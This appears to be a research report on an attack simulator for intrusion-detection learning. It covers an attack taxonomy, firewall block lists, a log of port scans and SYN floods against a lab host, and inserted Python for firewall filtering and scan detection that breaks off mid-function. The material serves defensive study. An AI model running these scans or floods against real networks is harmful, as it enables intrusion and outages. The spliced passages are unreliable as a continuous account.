The use of open computer networks as an environment for the exchange of information across the globe in distributed applications requires
improved security measures on the network and, in particular, for the information resources used in applications. Integrity, confidentiality and
availability of the network resources must be assured. To detect and suppress different types of unauthorized computer intrusions, modern
network security systems (NSS) must be armed with various protection means and be able to accumulate experience in order to increase their
ability to counter known types of intrusions and to learn new types of intrusions. The project will perform three main tasks.

1.  Develop  a  mathematical  model  and  a  tool  that  simulates  various  coordinated  intrusion  scenarios  against  computer  networks; 

2. Develop the mathematical foundations, architecture and implementation principles of an autonomous-software-tool technology
implementing a learning system for intrusion detection;

3. Develop the fundamentals, architecture and software for a computer security system based on multi-level encoding for information
protection in mass applications.

Currently, scientific efforts in the network security area are undertaken mainly in the development of network defense mechanisms.
level. Thus, each such step of the scenario is represented as a sequence of commands. Following the aforementioned conceptual
representation of the intrusion attempt, the research focuses on a two-level model of attacks. It is supposed that the available learning
information about intrusions of different types comprises the experts' information and a limited number of cases.
Fig.2.6.12. Example of the screen displaying the attack scenario generation process of the intention GAR
(an intermediate stage of attack scenario)


The graphical representation of attack outcome parameters (NS, PIR, PAR, PFB, PRA) values at
intention GAR realization for various values of input parameters is displayed in Fig.2.6.14.
Designations of experiment groups 1 - 16 in this integral diagram correspond to the following
combinations of input parameters:

1 - (1,1,1,1); 2 - (1,1,1,2); 3 - (1,1,2,1); 4 - (1,1,2,2);
5 - (1,2,1,1); 6 - (1,2,1,2); 7 - (1,2,2,1); 8 - (1,2,2,2);
9 - (2,1,1,1); 10 - (2,1,1,2); 11 - (2,1,2,1); 12 - (2,1,2,2);
13 - (2,2,1,1); 14 - (2,2,1,2); 15 - (2,2,2,1); 16 - (2,2,2,2).
Fig.2.6.13. Example of the screen displaying the attack scenario generation process of the intention GAR
(a final stage of attack scenario)

The string in parentheses (N1,N2,N3,N4) designates the combination of input parameters,
where N1 - protection degree of the network firewall, N2 - protection degree of the attacked host (personal)
firewall, N3 - protection parameters of the attacked host, N4 - degree of the hacker's knowledge about the
network.

For example, the combination (1,1,1,1) corresponds to the "Strong" (1) protection degree of the network
firewall, the "Strong" (1) protection degree of the attacked host (personal) firewall, "Strong" (1) protection
parameters of the attacked host, and the "Good" (1) degree of the hacker's knowledge about the network.

Changes of parameters PIR, PAR, PFB, PRA for various network and personal firewall
configurations are represented in Fig.2.6.15 - Fig.2.6.18 as graphic dependences.

For construction of these dependences the following values were used as x-coordinate parameters:
1 - both network and personal firewalls are active; 2 - only the network firewall is active; 3 - only
the personal firewall is active; 4 - neither firewall is active.

The changes of the main parameters under maximal protection of the attacked host ("Strong" (1)) and
maximal hacker's knowledge about the network ("Good" (1)) are depicted in Fig.2.6.15.

The changes of the main parameters under maximal protection of the attacked host ("Strong" (1)) and
minimal hacker's knowledge about the network ("Nothing" (2)) are depicted in Fig.2.6.16.

The changes of the main parameters under minimal protection of the attacked host ("None" (2)) and
maximal hacker's knowledge about the network ("Good" (1)) are depicted in Fig.2.6.17.

The changes of the main parameters under minimal protection of the attacked host ("None" (2)) and
minimal hacker's knowledge about the network ("Nothing" (2)) are depicted in Fig.2.6.18.
Fig.2.6.14. Integral diagram of attack outcome parameters values for intention GAR

Fig.2.6.15. Changes of parameters PIR, PAR, PFB, PRA values for various network and personal firewall
configurations under realization of intention GAR (protection degree of attacked host is "Strong" (1)
and degree of hacker's knowledge about a network is "Good" (1))

Fig.2.6.16. Changes of parameters PIR, PAR, PFB, PRA values for various network and personal firewall
configurations under realization of intention GAR (protection degree of attacked host is "Strong" (1)
and degree of hacker's knowledge about a network is "Nothing" (2))

Fig.2.6.17. Changes of parameters PIR, PAR, PFB, PRA values for various network and personal firewall
configurations under realization of intention GAR (protection degree of attacked host is "None" (2)
and degree of hacker's knowledge about a network is "Good" (1))

Fig.2.6.18. Changes of parameters PIR, PAR, PFB, PRA values for various network and personal firewall
configurations under realization of intention GAR (protection degree of attacked host is "None" (2)
and degree of hacker's knowledge about a network is "Nothing" (2))


Fig.2.6.19. Changes of parameter NS values for various network and personal firewall configurations
under realization of intention GAR (curves: PP=Strong, KN=Good; PP=Strong, KN=Nothing;
PP=Weak, KN=Good; PP=Weak, KN=Nothing)

Changes  of  parameter  NS  values  for  different  configurations  of  firewalls,  degrees  of  protection 
parameters  of  attacked  host  and  degrees  of  hacker’s  knowledge  about  a  network  are  depicted  in 
Fig.2.6.19  as  graphical  dependences. 

The  following  designations  are  used  in  the  figure:  PP-  protection  parameters  of  attacked  host;  KN 
-  degree  of  hacker’s  knowledge  about  a  network. 
2.2. Description of experiments for intention Confidentiality Violation Realization (CVR)

Let us consider the input parameters whose influence on the efficacy of attacks was investigated in
the experiments on intention CVR realization.

We first present the firewall parameters used at intention CVR realization.

At realization of intention CVR, besides intention CVR itself, some other intentions are used. The first
part of these additional intentions (IH, IS, IO, CI, RE, UE, ABE) serves for getting information about the
attacked network in order to fulfill the attacks of class CVR. The second part of the additional intentions (GAR
and EP) serves for getting access to a host and escalating privileges. The third part (GAD, CT,
CBD) is intended for gaining additional data, covering tracks and creating back doors for subsequent
access to the resources of the attacked host.

Let us consider the terminal attacks which are generated at realization of all these intentions (for
intentions IH, IS, IO, CI, RE, UE, ABE and GAR, described above in the description of intention GAR
realization, we list only the abbreviations of these attacks).

Terminal  attacks  of  intention  IH  (Identification  of  the  running  Hosts):  STIH,  SSIH,  DC. 

Terminal  attacks  of  intention  IS  (Identification  of  the  host  Services):  ST,  SS,  SFI,  SX,  SN,  SU, 
HS,  SFB,  DHS,  PS. 

Terminal attacks of intention IO (Identification of the host Operating system): TZ, TS, FF, RF,
RS, II, IL, MD, IW, MA, IV, IF, IP, ISP, IDOS.

Terminal attacks of intention CI (Collecting of additional Information): IST, AM, NS.

Terminal  attacks  of  intention  RE  (Resource  Enumeration):  EDNV,  EDC,  CNS,  ERD,  SRE,  NV, 
RMT,  SRVC,  SRVI,  DUMP,  LEG,  NAT,  NETD,  NETV. 

Terminal  attacks  of  intention  UE  (Users  and  groups  Enumeration):  DNNT,  SNMPE,  CNS,  FUE, 
UTFTP,  EUE,  PIUD,  ISU,  IAS. 

Terminal  attacks  of  intention  ABE  (Applications  and  Banners  Enumeration):  TCBG,  UNU,  FP, 
UREG,  UDUM. 

Terminal  attacks  of  intention  GAR  (Gaining  Access  to  Resources): 

CPF,  AAF,  BFPG,  RAH,  FCA,  PG,  AR,  UDG,  RAM,  RA,  DIMC,  EFE,  BO,  MMC,  UPWS,  TH, 
MP,  ABTH,  ATH,  SF,  LA,  PF,  SA,  PD,  UF,  IFS,  APF,  WDPF,  MUID,  MRF,  CC. 

Terminal  attacks  of  intention  EP  (Escalating  Privilege): 

PC,  UKE, 

where  PC  —  “Password  Cracking”,  UKE  —  “Use  of  Known  Exploits”. 

Terminal  attacks  of  intention  GAD  (Gaining  Additional  Data): 

ETR,  SCP, 

where ETR - "Evaluating Trust Relations", SCP - "Search for Cleartext Password".

Terminal  attacks  of  intention  CVR  (Confidentiality  Violation  Realization): 

FRR,  RBV, 

where FRR - "File(s) Reading Realization", RBV - "Reading By Virus".

Terminal  attacks  of  intention  CT  (Covering  Tracks): 

CL,  HT, 

where  CL  —  “Clearing  Logs”,  HT— “Hiding  Tools”. 

Terminal  attacks  of  intention  CBD  (Creating  Back  Doors): 

CRUA,  SBJ,  ISF,  PRCS,  IMM,  RAT, 

where CRUA - "Creating Rogue User Accounts", SBJ - "Scheduling Batch Jobs", ISF -
"Infecting Startup Files", PRCS - "Planting Remote Control Services", IMM -
"Installing Monitoring Mechanisms", RAT - "Replacing Apps with Trojans".

The  full  set  of  attacks  generated  at  realization  of  intention  CVR  (104  attacks)  is  as  follows: 

STIH,  SSIH,  DC,  ST,  SS,  SFI,  SX,  SN,  SU,  HS,  SFB,  DHS,  PS,  TZ,  TS,  FF,  RF,  RS,  II,  IL,  MD, 
IW, MA, IV, IF, IP, ISP, IDOS, IST, AM, NS, EDNV, EDC, CNS, ERD, SRE, NV, RMT, SRVC,
SRVI,  DUMP,  LEG,  NAT,  NETD,  NETV,  DNNT,  SNMPE,  CNS,  FUE,  UTFTP,  EUE,  PIUD,  ISU, 
IAS,  TCBG,  UNU,  FP,  UREG,  UDUM,  CPF,  AAF,  BFPG,  RAH,  FCA,  PG,  AR,  UDG,  RAM,  RA, 
DIMC,  EFE,  BO,  MMC,  UPWS,  TH,  MP,  ABTH,  ATH,  SF,  LA,  PF,  SA,  PD,  UF,  IFS,  APF,  WDPF, 
MUID,  MRF,  CC,  PC,  UKE,  ETR,  SCP,  FRR,  RBV,  CL,  HT,  CRUA,  SBJ,  ISF,  PRCS,  IMM,  RAT. 
In comparison with GAR the following attacks are added to this set: PC, UKE, ETR, SCP, FRR,
RBV, CL, HT, CRUA, SBJ, ISF, PRCS, IMM, RAT.

The list of attacks removed from the full set of attacks (31 attacks (30 %)) in order to form
the list of attacks blocked by the network firewall is as follows:

SX, TS, FF, IDOS, IST, DNNT, SNMPE, AR, UDG, UREG, UDUM, FUE, UTFTP, EUE, PIUD,
ISU, IAS, RAM, RA, DIMC, MMC, UPWS, LA, PF, SA, MRF, CC, UKE, FRR, CRUA, RAT.

In  comparison  with  GAR  the  following  attacks  are  added  to  this  set:  UKE,  FRR,  CRUA,  RAT. 

The list of attacks removed from the full set of attacks (42 attacks (40 %)) in order to form
the list of attacks blocked by the personal firewall is as follows:

SSIH, DC, ST, RS, II, IL, MD, IW, MA, CNS, ERD, SRE, NV, RMT, NETV, CNS, TCBG,
UNU, FP, MP, ABTH, ATH, SF, PD, TH, UF, IFS, APF, SRVI, DUMP, LEG, NAT, NETD, CPF,
AAF, WDPF, PC, ETR, CL, HT, ISF, PRCS.

In  comparison  with  GAR  the  following  attacks  are  added  to  this  set:  PC,  ETR,  CL,  HT,  ISF, 
PRCS. 

On the basis of these considerations, it was supposed that, when the attacks realizing intention CVR
are carried out, the network firewall can block the following terminal-level attacks depending on its
protection degree:

1) For the "Strong" protection degree, the following 73 attacks (70 %) are chosen from the full set
of attacks generated at intention CVR realization:

STIH,  SSIH,  DC,  ST,  SS,  SFI,  SN,  SU,  HS,  SFB,  DHS,  PS,  TZ,  RF,  RS,  II,  IL,  MD,  IW,  MA,  IV, 
IF,  IP,  ISP,  AM,  NS,  EDNV,  EDC,  CNS,  ERD,  SRE,  NV,  RMT,  SRVC,  SRVI,  DUMP,  LEG,  NAT, 
NETD,  NETV,  CNS,  TCBG,  UNU,  FP,  CPF,  AAF,  BFPG,  RAH,  FCA,  PG,  EFE,  BO,  TH,  MP, 
ABTH,  ATH,  SF,  PD,  UF,  IFS,  APF,  WDPF,  MUID,  PC,  ETR,  SCP,  RBV,  CL,  HT,  SBJ,  ISF,  PRCS, 
IMM. 

In  comparison  with  GAR  the  following  attacks  are  added  to  this  set:  PC,  ETR,  SCP,  RBV,  CL, 
HT,  SBJ,  ISF,  PRCS,  IMM. 

2) For "None": no attacks are blocked (the list is empty).

The protection degrees of the personal firewall are as follows:

1) For the "Strong" protection degree, the following 62 attacks (60 %) are chosen from the full set
of attacks generated at intention CVR realization:

STIH, SS, SFI, SN, SU, HS, SFB, DHS, PS, TZ, RF, IV, IF, IP, ISP, AM, NS, EDNV, EDC,
SRVC, BFPG, RAH, FCA, PG, EFE, BO, MUID, SX, TS, FF, IDOS, IST, DNNT, SNMPE, AR,
UDG, UREG, UDUM, FUE, UTFTP, EUE, PIUD, ISU, IAS, RAM, RA, DIMC, MMC, UPWS, LA,
PF, SA, MRF, CC, UKE, SCP, FRR, RBV, CRUA, SBJ, IMM, RAT.

In  comparison  with  GAR  the  following  attacks  are  added  to  this  set:  UKE,  SCP,  FRR,  RBV, 
CRUA,  SBJ,  IMM,  RAT. 

2) For "None": no attacks are blocked (the list is empty).

The protection parameters of the attacked host and the parameters defining the hacker's knowledge about
the network are the same as those used at realization of intention GAR.
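The two "Strong" block lists above determine which terminal attacks can still reach the host under each of the four firewall configurations that serve as the x-coordinate in the figures that follow. The Python script below is an added worked example, not code from the report's Attack Simulator: it takes the CVR attack lists exactly as given above, assumes that a firewall at degree "None" (2) blocks nothing and at degree "Strong" (1) blocks every attack outside its "removed" list, and computes, for each configuration, the attacks that pass and the intentions left without any usable terminal attack. It also enumerates the 16 experiment groups as (N1,N2,N3,N4) tuples in the report's order. Python sets are used, so CNS, which the report lists under both RE and UE and therefore counts twice, is counted once here.

```python
"""Firewall filtering of the terminal attacks listed for intention CVR.

Added worked example, not code from the report. The attack lists are taken
from the report as given; the one modelling assumption is that a firewall at
degree "None" (2) blocks nothing and at degree "Strong" (1) blocks every attack
outside its "removed" list. Sets are used, so CNS (listed under both RE and UE
in the report) is counted once; set sizes are therefore one lower than the
report's counts wherever CNS is involved."""
from itertools import product

# Terminal attacks per intention, as listed in the report.
INTENTIONS = {name: frozenset(attacks.split()) for name, attacks in {
    "IH":  "STIH SSIH DC",
    "IS":  "ST SS SFI SX SN SU HS SFB DHS PS",
    "IO":  "TZ TS FF RF RS II IL MD IW MA IV IF IP ISP IDOS",
    "CI":  "IST AM NS",
    "RE":  "EDNV EDC CNS ERD SRE NV RMT SRVC SRVI DUMP LEG NAT NETD NETV",
    "UE":  "DNNT SNMPE CNS FUE UTFTP EUE PIUD ISU IAS",
    "ABE": "TCBG UNU FP UREG UDUM",
    "GAR": "CPF AAF BFPG RAH FCA PG AR UDG RAM RA DIMC EFE BO MMC UPWS TH MP "
           "ABTH ATH SF LA PF SA PD UF IFS APF WDPF MUID MRF CC",
    "EP":  "PC UKE",
    "GAD": "ETR SCP",
    "CVR": "FRR RBV",
    "CT":  "CL HT",
    "CBD": "CRUA SBJ ISF PRCS IMM RAT",
}.items()}
FULL_SET = frozenset().union(*INTENTIONS.values())

# The attacks the report "removes from the full set" to build each firewall's
# "Strong" block list, i.e. the attacks that firewall lets through.
NET_FW_PASSES = frozenset(
    "SX TS FF IDOS IST DNNT SNMPE AR UDG UREG UDUM FUE UTFTP EUE PIUD ISU IAS "
    "RAM RA DIMC MMC UPWS LA PF SA MRF CC UKE FRR CRUA RAT".split())
PERS_FW_PASSES = frozenset(
    "SSIH DC ST RS II IL MD IW MA CNS ERD SRE NV RMT NETV TCBG UNU FP MP ABTH "
    "ATH SF PD TH UF IFS APF SRVI DUMP LEG NAT NETD CPF AAF WDPF PC ETR CL HT "
    "ISF PRCS".split())

STRONG, NONE = 1, 2          # degree encoding used in the (N1,N2,N3,N4) tuples

def blocked_by(fw_passes, degree):
    """Attacks one firewall blocks at the given protection degree (assumption:
    "Strong" blocks everything outside its pass list, "None" blocks nothing)."""
    if degree == STRONG:
        return FULL_SET - fw_passes
    if degree == NONE:
        return frozenset()
    raise ValueError(f"unknown protection degree {degree!r}")

def passing_attacks(net_degree, pers_degree):
    """Terminal attacks that reach the host: blocked by neither firewall."""
    blocked = blocked_by(NET_FW_PASSES, net_degree) | blocked_by(PERS_FW_PASSES, pers_degree)
    return FULL_SET - blocked

def intentions_without_attacks(net_degree, pers_degree):
    """Intentions left with no usable terminal attack under this configuration."""
    alive = passing_attacks(net_degree, pers_degree)
    return sorted(name for name, attacks in INTENTIONS.items() if not attacks & alive)

# Experiment groups 1-16 are the (N1,N2,N3,N4) tuples in the report's order.
EXPERIMENT_GROUPS = dict(enumerate(product((STRONG, NONE), repeat=4), start=1))

# The four firewall configurations used as x-coordinate in the figures:
# 1 both active, 2 network only, 3 personal only, 4 none.
X_CONFIGS = {1: (STRONG, STRONG), 2: (STRONG, NONE), 3: (NONE, STRONG), 4: (NONE, NONE)}

def summary():
    """x-coordinate -> (number of attacks that pass, intentions with nothing left)."""
    return {x: (len(passing_attacks(n, p)), intentions_without_attacks(n, p))
            for x, (n, p) in X_CONFIGS.items()}

if __name__ == "__main__":
    for x, (count, dead) in summary().items():
        print(f"firewall configuration {x}: {count:3d} attacks pass; "
              f"intentions with no attack left: {dead or 'none'}")
```

Running it shows that the two pass-through lists are disjoint, so with both firewalls "Strong" no terminal attack gets through at all. With only the network firewall active the attacker keeps FRR (so the CVR intention itself is still reachable) but has no attack left for covering tracks (CT) or for GAD; with only the personal firewall active both FRR and RBV are blocked, so CVR cannot be realized even though most of the reconnaissance intentions still have attacks that pass.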

Examples of the screens displaying various stages of attack scenario generation for intention
CVR are presented in Fig.2.6.20 - Fig.2.6.23. The values of the input parameters used for the attack
scenario are as follows:

(1)  protection  degree  of  network  firewall  is  “None”  (2); 

(2)  protection  degree  of  personal  firewall  is  “Strong”  (1); 

(3)  protection  degree  of  host  parameters  is  “Strong”  (1); 

(4)  degree  of  a  hacker’s  knowledge  about  a  network  is  “Good”  (1). 

The graphical representation of attack outcome parameters (NS, PIR, PAR, PFB, PRA) values at
intention CVR realization for various values of input parameters is displayed in Fig.2.6.24.
Designations of experiment groups 1 - 16 in this integral diagram correspond to the same
combinations of input parameters as for intention GAR: 1 - (1,1,1,1); 2 - (1,1,1,2); 3 - (1,1,2,1);
4 - (1,1,2,2); 5 - (1,2,1,1); 6 - (1,2,1,2); 7 - (1,2,2,1); 8 - (1,2,2,2); 9 - (2,1,1,1); 10 - (2,1,1,2);
11 - (2,1,2,1); 12 - (2,1,2,2); 13 - (2,2,1,1); 14 - (2,2,1,2); 15 - (2,2,2,1); 16 - (2,2,2,2).
Fig.2.6.20. Example of the screen displaying the attack scenario generation process of the intention CVR
(an initial stage of attack scenario)

Changes of parameters PIR, PAR, PFB, PRA for intention CVR realization under various network
and personal firewall configurations are represented in Fig.2.6.25 - Fig.2.6.28 as graphic
dependences.

For construction of these dependences the same x-coordinate values as for intention GAR were
used: 1 - both network and personal firewalls are active; 2 - only the network firewall is active;
3 - only the personal firewall is active; 4 - neither firewall is active.

The changes of the main parameters under maximal protection of the attacked host ("Strong" (1)) and
maximal hacker's knowledge about the network ("Good" (1)) are depicted in Fig.2.6.25.

The changes of the main parameters under maximal protection of the attacked host ("Strong" (1)) and
minimal hacker's knowledge about the network ("Nothing" (2)) are depicted in Fig.2.6.26.

The changes of the main parameters under minimal protection of the attacked host ("None" (2)) and
maximal hacker's knowledge about the network ("Good" (1)) are depicted in Fig.2.6.27.

The changes of the main parameters under minimal protection of the attacked host ("None" (2)) and
minimal hacker's knowledge about the network ("Nothing" (2)) are depicted in Fig.2.6.28.

Changes  of  parameter  NS  values  for  different  configurations  of  firewalls,  degrees  of  protection 
parameters  of  attacked  host  and  degrees  of  hacker’s  knowledge  about  a  network  are  depicted  in 
Fig.2.6.29  as  graphical  dependences. 
Fig.2.6.21. Example of the screen displaying the attack scenario generation process of the intention CVR
(a second stage of attack scenario)

Fig.2.6.22. Example of the screen displaying the attack scenario generation process of the intention CVR
(a third stage of attack scenario)

Fig.2.6.23. Example of the screen displaying the attack scenario generation process of the intention CVR
(a final stage of attack scenario)

The total logs of attack traces produced in the experiments fulfilled at the macro-level are given in
Appendix A4.1.

The total log of the Attack Simulator run for the intention ABE ("Applications and Banners
Enumeration") realization is presented in paragraph A4.1.1. The log was generated under the
following conditions:
following  conditions: 

•  protection  degree  of  network  firewall  is  “Strong”  (1); 

•  an  attacked  host  firewall  is  absent  (3). 

The total log of the Attack Simulator run for the intention GAR ("Gaining Access to Resources")
realization is presented in paragraph A4.1.2. The log was generated under the following conditions:

•  protection  degree  of  network  firewall  is  “None”  (2); 

•  protection  degree  of  attacked  host  firewall  is  “None”  (2); 

•  protection  parameters  of  attacked  host  are  “Weak”  (2); 

•  degree  of  hacker’s  knowledge  about  a  network  is  “Nothing”  (2). 

The total log of the Attack Simulator run for the intention CVR ("Confidentiality Violation
Realization") realization is presented in paragraph A4.1.3. The log was generated under the following
conditions:

•  protection  degree  of  network  firewall  is  “None”  (2); 

•  protection  degree  of  attacked  host  firewall  is  “Strong”  (1); 

•  protection  parameters  of  attacked  host  are  “Strong”  (1); 

•  degree  of  hacker’s  knowledge  about  a  network  is  “Good”  (1). 

The  attributes  of  the  logs  correspond  to  the  attributes  of  the  ontology  notions  Log  and  LogResult. 
Fig.2.6.24. Integral diagram of attack outcome parameters values for intention CVR

Fig.2.6.25. Changes of parameters PIR, PAR, PFB, PRA values for various network and personal firewall
configurations under realization of intention CVR (protection degree of attacked host is "Strong" (1)
and degree of hacker's knowledge about a network is "Good" (1))

Fig.2.6.26. Changes of parameters PIR, PAR, PFB, PRA values for various network and personal firewall
configurations under realization of intention CVR (protection degree of attacked host is "Strong" (1)
and degree of hacker's knowledge about a network is "Nothing" (2))

Fig.2.6.27. Changes of parameters PIR, PAR, PFB, PRA values for various network and personal firewall
configurations under realization of intention CVR (protection degree of attacked host is "None" (2)
and degree of hacker's knowledge about a network is "Good" (1))

Fig.2.6.28. Changes of parameters PIR, PAR, PFB, PRA values for various network and personal firewall
configurations under realization of intention CVR (protection degree of attacked host is "None" (2)
and degree of hacker's knowledge about a network is "Nothing" (2))

[Axes of Fig.2.6.25 - Fig.2.6.28: y - Percentage of realization; x - firewall configuration 1, 2, 3, 4;
curves: PIR, PAR, PFB, PRA]

Fig.2.6.29. Changes of parameter NS values for various network and personal firewall configurations
under realization of intention CVR (curves: PP=Strong, KN=Good; PP=Strong, KN=Nothing;
PP=Weak, KN=Good; PP=Weak, KN=Nothing)
2.6.2. Simulation of attacks on micro-level (generation of malicious network traffic against a real
computer network)

For checking the efficacy of the Attack Simulator prototype at the micro-level, network packets for
the following classes of attacks were generated:

1) Port scanning, including the subclasses "Port Scanning" (SPIH) and "Port Scanning during
Identification of Services" (SPIS);

2) Denial of service, on the basis of realization of "SYN flood" (SF);

3) Password guessing, on the basis of realization of the attacks "Password Guessing" (PG) and
"Password Cracking" (PC).

The network model used in the Attack Simulator corresponded to the real computer network against
which the attacks at the micro-level were carried out.

All attacks described in this paragraph were directed at the host with IP address
192.168.130.135.

For the class of attacks "Port Scanning" (SPIH), experiments on realization of the attacks "TCP
connect scan" (STIH) and "TCP SYN scan" (SSIH) were fulfilled.

For the class of attacks "Port Scanning during Identification of Services" (SPIS), experiments on
realization of the attacks "TCP connect scan" (ST), "TCP SYN scan" (SS), "TCP FIN scan" (SFI),
"TCP Xmas Tree scan" (SX), "TCP Null scan" (SN), "UDP scan" (SU) and "Half scan" (HS) were
carried out.

Examples of the screens displaying the generation of various scanning attacks are depicted
in Fig.2.6.30 and Fig.2.6.31.

An example of the window showing realization of the intention "Port Scanning during
Identification of Services" (SPIS) scenario at the macro-level and the calls of various scanning attacks is
represented in Fig.2.6.30.


Fig.2.6.30. Example of the window showing realization of the intention "Port Scanning during Identification of
Services" (SPIS) scenario at a macro-level
[Fig.2.6.31 window text (scanports v.1.0, started from "Shortcut to PORTAL.BAT"), recovered from the
screen capture. Extraction split each packet line into a left part (addresses) and a right part (seq/ack);
they are rejoined below. The flags field is only partly legible and is marked "..."; "Port N is seems to be
OPEN/CLOSED" is the tool's own wording.]

Starting scanports v.1.0. TCP scanning by using AttackID: SS
Selected device: Realtek 8139-series PCI NIC
1. 192.168.130.136.1050->192.168.130.135.21 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.21->192.168.130.136.1050 TCP ... ACK <seq: 8b6feee8 ack: 12f799>
Port 21 is seems to be OPEN.
3. 192.168.130.136.1050->192.168.130.135.21 TCP ... ACK <seq: 12f799 ack: 8b6feee9>
1. 192.168.130.136.1050->192.168.130.135.79 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.79->192.168.130.136.1050 TCP ... ACK <seq: 0 ack: 12f799>
Port 79 is seems to be CLOSED.
3. 192.168.130.136.1050->192.168.130.135.79 TCP ... ACK <seq: 12f799 ack: 1>
1. 192.168.130.136.1050->192.168.130.135.80 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.80->192.168.130.136.1050 TCP ... ACK <seq: 8b788c3f ack: 12f799>
Port 80 is seems to be OPEN.
3. 192.168.130.136.1050->192.168.130.135.80 TCP ... ACK <seq: 12f799 ack: 8b788c40>
1. 192.168.130.136.1050->192.168.130.135.81 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.81->192.168.130.136.1050 TCP ... ACK <seq: 0 ack: 12f799>
Port 81 is seems to be CLOSED.
3. 192.168.130.136.1050->192.168.130.135.81 TCP ... ACK <seq: 12f799 ack: 1>

Starting scanports v.1.0. TCP scanning by using AttackID: HS
Selected device: Realtek 8139-series PCI NIC
1. 192.168.130.136.1050->192.168.130.135.21 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.21->192.168.130.136.1050 TCP ... ACK <seq: 8b892e46 ack: 12f799>
Port 21 is seems to be OPEN.
3. 192.168.130.136.1050->192.168.130.135.21 TCP ... ACK <seq: 12f799 ack: 8b892e47>
1. 192.168.130.136.1050->192.168.130.135.79 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.79->192.168.130.136.1050 TCP ... ACK <seq: 0 ack: 12f799>
Port 79 is seems to be CLOSED.
3. 192.168.130.136.1050->192.168.130.135.79 TCP ... ACK <seq: 12f799 ack: 1>
1. 192.168.130.136.1050->192.168.130.135.80 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.80->192.168.130.136.1050 TCP ... ACK <seq: 8b919779 ack: 12f799>
Port 80 is seems to be OPEN.
3. 192.168.130.136.1050->192.168.130.135.80 TCP ... ACK <seq: 12f799 ack: 8b91977a>
1. 192.168.130.136.1050->192.168.130.135.81 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.81->192.168.130.136.1050 TCP ... ACK <seq: 0 ack: 12f799>
Port 81 is seems to be CLOSED.
3. 192.168.130.136.1050->192.168.130.135.81 TCP ... ACK <seq: 12f799 ack: 1>

Starting scanports v.1.0. TCP scanning by using AttackID: SX
Selected device: Realtek 8139-series PCI NIC
1. 192.168.130.136.1050->192.168.130.135.21 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.21->192.168.130.136.1050 TCP ... ACK <seq: 8ba2e74d ack: 12f799>
Port 21 is seems to be OPEN.
3. 192.168.130.136.1050->192.168.130.135.21 TCP ... ACK <seq: 12f799 ack: 8ba2e74e>
1. 192.168.130.136.1050->192.168.130.135.79 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.79->192.168.130.136.1050 TCP ... ACK <seq: 0 ack: 12f799>
Port 79 is seems to be CLOSED.
3. 192.168.130.136.1050->192.168.130.135.79 TCP ... ACK <seq: 12f799 ack: 1>
1. 192.168.130.136.1050->192.168.130.135.80 TCP ... <seq: 12f798 ack: 0>
2. 192.168.130.135.80->192.168.130.136.1050 TCP ... ACK <seq: 8bab55f7 ack: 12f799>
Port 80 is seems to be OPEN.
3. 192.168.130.136.1050->192.168.130.135.80 TCP ... ACK <seq: 12f799 ack: 8bab55f8>

Fig.2.6.31. Example of the window showing the scanning attacks realization at a micro-level
Fig.2.6.32. Example of the window showing realization of the attack scenario "Denial of service" (DS) at a
macro-level and a call of the "SYN flood" (SF) attack action


An example of the window showing realization of scanning attacks at the micro-level is presented in
Fig.2.6.31. These attacks were called from the intention "Port Scanning during Identification of
Services" (SPIS) scenario, a fragment of which is represented in Fig.2.6.30.

Fragments of the attacks "TCP SYN scan" (SS), "Half scan" (HS) and "TCP Xmas Tree scan" (SX) are
shown in Fig.2.6.31.

Examples of the screens displaying the generation of the attack "SYN flood" (SF) of the class "Denial
of service" are depicted in Fig.2.6.32 and Fig.2.6.33.

A fragment of the attack "Denial of service" (DS) scenario at the macro-level and the call of the attack
"SYN flood" (SF) is shown in Fig.2.6.32.

An example of the window showing the attack "SYN flood" (SF) realization at the micro-level is
represented in Fig.2.6.33.
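The three-segment exchange per port in Fig.2.6.31 (probe, target reply, tear-down by the scanner) and the one-SYN-per-source-port stream of the SF attack are the patterns a network sensor watching this traffic would key on. The Python script below is an added example, not part of the report or its Attack Simulator: it parses packet lines in the format the micro-level tools print, reproduces the OPEN/CLOSED verdict from the target's reply (SYN+ACK acknowledging seq+1 versus RST), and runs a SYN-scan detector and a half-open-connection (SYN flood) detector over a constructed trace in the same format. The sample trace, the scanner and target addresses used in it, and the thresholds (3 distinct ports, 20 half-open connections) are assumptions for illustration, not values taken from the report's logs.

```python
"""Detection logic over packet lines in the format the Attack Simulator's
micro-level tools print (see Fig.2.6.31 and the SYN flood window):
    [n.] src.sport->dst.dport TCP FLAGS <seq: hex ack: hex>
Added example, not code from the report. The sample traces below are
constructed in that format (they are not the report's own log) and the
detection thresholds are illustrative choices."""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+)->"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+)\s+TCP\s*"
    r"(?P<flags>(?:[A-Z]+\s*)*?)<seq:\s*(?P<seq>[0-9a-fA-F]+)\s+ack:\s*(?P<ack>[0-9a-fA-F]+)>")

def parse_line(line):
    """One packet line -> dict, or None for lines that are not packets."""
    m = LINE_RE.search(line)
    if not m:
        return None
    return {"src": m["src"], "sport": int(m["sport"]), "dst": m["dst"],
            "dport": int(m["dport"]), "flags": frozenset(m["flags"].split()),
            "seq": int(m["seq"], 16), "ack": int(m["ack"], 16)}

def parse_trace(text):
    return [p for p in map(parse_line, text.splitlines()) if p]

def port_states(packets, scanner, target):
    """Reproduce the scanner's OPEN/CLOSED verdict from the target's reply to
    each SYN probe: SYN+ACK acknowledging seq+1 means open, RST means closed."""
    probe_seq = {}                      # (scanner port, target port) -> probe seq
    states = {}
    for p in packets:
        if p["src"] == scanner and p["dst"] == target and p["flags"] == {"SYN"}:
            probe_seq[(p["sport"], p["dport"])] = p["seq"]
        elif p["src"] == target and p["dst"] == scanner:
            seq = probe_seq.get((p["dport"], p["sport"]))
            if seq is not None and p["ack"] == seq + 1:
                if "RST" in p["flags"]:
                    states[p["sport"]] = "closed"
                elif {"SYN", "ACK"} <= p["flags"]:
                    states[p["sport"]] = "open"
    return states

def syn_scan_sources(packets, min_ports=3):
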